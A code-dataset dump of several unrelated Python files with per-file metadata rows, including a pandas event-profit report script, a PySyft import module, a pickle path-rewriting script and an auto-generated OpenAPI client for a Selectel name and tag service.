df_productos.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_productos['BeneficioNeto'].sum())
# Calculo de totales de Bebidas
df_bebidas.at['Total Coste', 'Coste'] = str(df_bebidas['Coste'].sum())
df_bebidas.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_bebidas['BeneficioBruto'].sum())
df_bebidas.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_bebidas['BeneficioNeto'].sum())
# Calculo de totales de Materiales
df_materiales.at['Total Coste', 'Coste'] = str(df_materiales['Coste'].sum())
df_materiales.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_materiales['BeneficioBruto'].sum())
df_materiales.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_materiales['BeneficioNeto'].sum())
# Calculo de totales de Trabajadores
df_trabajadores.at['Total Coste', 'Coste'] = str(df_trabajadores['Coste'].sum())
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloEvento)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
df_materiales.to_excel (excel_writer=writer, sheet_name='Materiales')
df_trabajadores.to_excel(excel_writer=writer, sheet_name='Trabajadores')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_evento.html')
template_vars = {
"Evento": str_tituloEvento,
"Titulo": "Beneficio del Evento: " + str_tituloEvento,
"Productos": df_productos.to_html (na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center'),
"Materiales": df_materiales.to_html (na_rep="", justify='center'),
"Trabajadores": df_trabajadores.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'evento.pdf')
| 35.950437
| 107
| 0.751602
| 1,616
| 12,331
| 5.471535
| 0.07797
| 0.063447
| 0.032233
| 0.03653
| 0.838611
| 0.83126
| 0.81701
| 0.804456
| 0.800611
| 0.795861
| 0
| 0.001852
| 0.124321
| 12,331
| 342
| 108
| 36.055556
| 0.817003
| 0.13681
| 0
| 0.732323
| 0
| 0
| 0.190692
| 0.002365
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035354
| false
| 0
| 0.030303
| 0
| 0.065657
| 0.065657
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cd56976c3b6c694cb9f59ae3236fa5e334b8ac80
| 409
|
py
|
Python
|
syft/serde/msgpack/__init__.py
|
NicoSerranoP/PySyft
|
87fcd566c46fce4c16d363c94396dd26bd82a016
|
[
"Apache-2.0"
] | 7
|
2020-04-20T22:22:08.000Z
|
2020-07-25T17:32:08.000Z
|
syft/serde/msgpack/__init__.py
|
NicoSerranoP/PySyft
|
87fcd566c46fce4c16d363c94396dd26bd82a016
|
[
"Apache-2.0"
] | 3
|
2020-04-24T21:20:57.000Z
|
2020-05-28T09:17:02.000Z
|
syft/serde/msgpack/__init__.py
|
NicoSerranoP/PySyft
|
87fcd566c46fce4c16d363c94396dd26bd82a016
|
[
"Apache-2.0"
] | 4
|
2020-04-24T22:32:37.000Z
|
2020-05-25T19:29:20.000Z
|
from syft.serde.msgpack import serde # noqa: F401
from syft.serde.msgpack import native_serde # noqa: F401
from syft.serde.msgpack import torch_serde # noqa: F401
from syft.serde.msgpack import proto # noqa: F401
from syft.serde.msgpack.proto import proto_type_info # noqa: F401
from syft.serde.msgpack.serde import serialize # noqa: F401
from syft.serde.msgpack.serde import deserialize # noqa: F401
| 45.444444
| 66
| 0.784841
| 63
| 409
| 5.031746
| 0.222222
| 0.176656
| 0.287066
| 0.44164
| 0.785489
| 0.70347
| 0.615142
| 0.615142
| 0
| 0
| 0
| 0.059659
| 0.139364
| 409
| 8
| 67
| 51.125
| 0.840909
| 0.185819
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cd7e1afa5a3d6137b5f93d88d441e454a193a15c
| 1,217
|
py
|
Python
|
pointpillars_with_TANet/second/toy_example/pickle_change.py
|
mjseong0414/TANet
|
830baa699c990f3f52baa062ab7b196825bf128e
|
[
"MIT"
] | null | null | null |
pointpillars_with_TANet/second/toy_example/pickle_change.py
|
mjseong0414/TANet
|
830baa699c990f3f52baa062ab7b196825bf128e
|
[
"MIT"
] | null | null | null |
pointpillars_with_TANet/second/toy_example/pickle_change.py
|
mjseong0414/TANet
|
830baa699c990f3f52baa062ab7b196825bf128e
|
[
"MIT"
] | null | null | null |
import pickle
import sys
sys.path.append("/home/minjae/TANet/pointpillars_with_TANet/second/data/")
f = open("/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/JRDB_to_kitti_infos_val.pkl", 'rb')
data = pickle.load(f)
import pdb; pdb.set_trace()
# f = open("/home/joon/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/JRDB_to_kitti_infos_val_origin.pkl", 'rb')
# data = pickle.load(f)
# import pdb; pdb.set_trace()
for i in range(len(data)):
before_str = data[i]['velodyne_path']
after_str = before_str.replace('/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/', '')
data[i]['velodyne_path'] = '/home/spalab/jrdb_3dteam/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/' + after_str
#import pdb; pdb.set_trace()
before_str = data[i]['img_path']
after_str = before_str.replace('/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/', '')
data[i]['img_path'] = '/home/spalab/jrdb_3dteam/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/' + after_str
with open('/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/JRDB_val.pkl', 'wb') as f:
pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
| 48.68
| 126
| 0.760887
| 193
| 1,217
| 4.497409
| 0.233161
| 0.062212
| 0.114055
| 0.239631
| 0.800691
| 0.77765
| 0.77765
| 0.77765
| 0.724654
| 0.724654
| 0
| 0.0018
| 0.087099
| 1,217
| 25
| 127
| 48.68
| 0.779478
| 0.161052
| 0
| 0.133333
| 0
| 0
| 0.568338
| 0.523107
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cd85de0168482227fb215bef0d0d59a6198a7e71
| 47
|
py
|
Python
|
txamqpr/__init__.py
|
aliowka/txamqpr
|
c96082fa6807ea0945a273f7c7d355bb4cf709ec
|
[
"Apache-2.0"
] | null | null | null |
txamqpr/__init__.py
|
aliowka/txamqpr
|
c96082fa6807ea0945a273f7c7d355bb4cf709ec
|
[
"Apache-2.0"
] | null | null | null |
txamqpr/__init__.py
|
aliowka/txamqpr
|
c96082fa6807ea0945a273f7c7d355bb4cf709ec
|
[
"Apache-2.0"
] | null | null | null |
from .txamqpr import txAMQPReconnectingFactory
| 23.5
| 46
| 0.893617
| 4
| 47
| 10.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f87fa17534f7e029aa3bfe1bf46d5a2cc17fbc9f
| 111
|
py
|
Python
|
dist/micropy-cli/frozen/uasyncio/__init__.py
|
kevindawson/Pico-Stub
|
6f9112779d4d81f821a3af273a450b9329ccdbab
|
[
"Apache-2.0"
] | 19
|
2021-01-25T23:56:09.000Z
|
2022-02-21T13:55:16.000Z
|
dist/micropy-cli/frozen/uasyncio/__init__.py
|
kevindawson/Pico-Stub
|
6f9112779d4d81f821a3af273a450b9329ccdbab
|
[
"Apache-2.0"
] | 18
|
2021-02-06T09:03:09.000Z
|
2021-10-04T16:36:35.000Z
|
dist/micropy-cli/frozen/uasyncio/__init__.py
|
kevindawson/Pico-Stub
|
6f9112779d4d81f821a3af273a450b9329ccdbab
|
[
"Apache-2.0"
] | 6
|
2021-01-26T08:41:47.000Z
|
2021-04-27T11:33:33.000Z
|
from typing import Any
def __getattr__(attr: Any) -> Any: ...
# 0: return value
# ? 0: return value
| 18.5
| 38
| 0.603604
| 15
| 111
| 4.2
| 0.666667
| 0.222222
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024691
| 0.27027
| 111
| 5
| 39
| 22.2
| 0.753086
| 0.297297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f89d2cc66bb344f5ec290dbfab754a9911bd1f89
| 59,714
|
py
|
Python
|
sel_dedicated_codegen/api/miscellaneous_api.py
|
xRocketPowerx/python-sel-dedicated
|
3b9b41fbd7abc05d427e8abf688b007b6dcf9e96
|
[
"MIT"
] | 2
|
2019-10-12T08:56:31.000Z
|
2019-10-12T17:34:51.000Z
|
sel_dedicated_codegen/api/miscellaneous_api.py
|
xRocketPowerx/python-sel-dedicated
|
3b9b41fbd7abc05d427e8abf688b007b6dcf9e96
|
[
"MIT"
] | null | null | null |
sel_dedicated_codegen/api/miscellaneous_api.py
|
xRocketPowerx/python-sel-dedicated
|
3b9b41fbd7abc05d427e8abf688b007b6dcf9e96
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Seido User REST API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.4.8
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sel_dedicated_codegen.api_client import ApiClient
from sel_dedicated_codegen.exceptions import (
ApiTypeError,
ApiValueError
)
class MiscellaneousApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_user_name_update_view(self, uuid, **kwargs): # noqa: E501
"""Delete user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_name_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseBaseModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_user_name_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def delete_user_name_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Delete user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_name_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseBaseModel, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `delete_user_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name/{uuid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseBaseModel', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_name_tags_view(self, uuid, **kwargs): # noqa: E501
"""Get list of name's tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_tags_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameTagsListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_name_tags_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_name_tags_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get list of name's tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_tags_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameTagsListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_name_tags_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_name_tags_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/name/{uuid}/tag', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameTagsListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_name_update_view(self, uuid, **kwargs): # noqa: E501
"""Get name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_name_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_name_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/name/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_name_view(self, **kwargs): # noqa: E501
"""Get name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param list[str] tags: tags
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameListModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_name_view_with_http_info(**kwargs) # noqa: E501
def get_name_view_with_http_info(self, **kwargs): # noqa: E501
"""Get name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param list[str] tags: tags
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameListModel, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['tags', 'limit', 'page', 'sort', 'order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tags' in local_var_params:
query_params.append(('tags', local_var_params['tags'])) # noqa: E501
collection_formats['tags'] = 'multi' # noqa: E501
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'order' in local_var_params:
query_params.append(('order', local_var_params['order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/name', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameListModel', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_random_name_view(self, **kwargs): # noqa: E501
"""Get random name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_name_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool get_user_name: flag: need to return one of user's name
:param list[str] tags: tags
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_random_name_view_with_http_info(**kwargs) # noqa: E501
def get_random_name_view_with_http_info(self, **kwargs): # noqa: E501
"""Get random name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_name_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool get_user_name: flag: need to return one of user's name
:param list[str] tags: tags
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['get_user_name', 'tags'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_random_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'get_user_name' in local_var_params:
query_params.append(('get_user_name', local_var_params['get_user_name'])) # noqa: E501
if 'tags' in local_var_params:
query_params.append(('tags', local_var_params['tags'])) # noqa: E501
collection_formats['tags'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/random', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag_names_view(self, uuid, **kwargs): # noqa: E501
"""Get list of tag's names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_names_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseTagNamesListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_names_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_tag_names_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get list of tag's names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_names_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseTagNamesListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag_names_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_tag_names_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/tag/{uuid}/name', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseTagNamesListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag_update_view(self, uuid, **kwargs): # noqa: E501
"""Get tag data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseTagResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_tag_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get tag data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
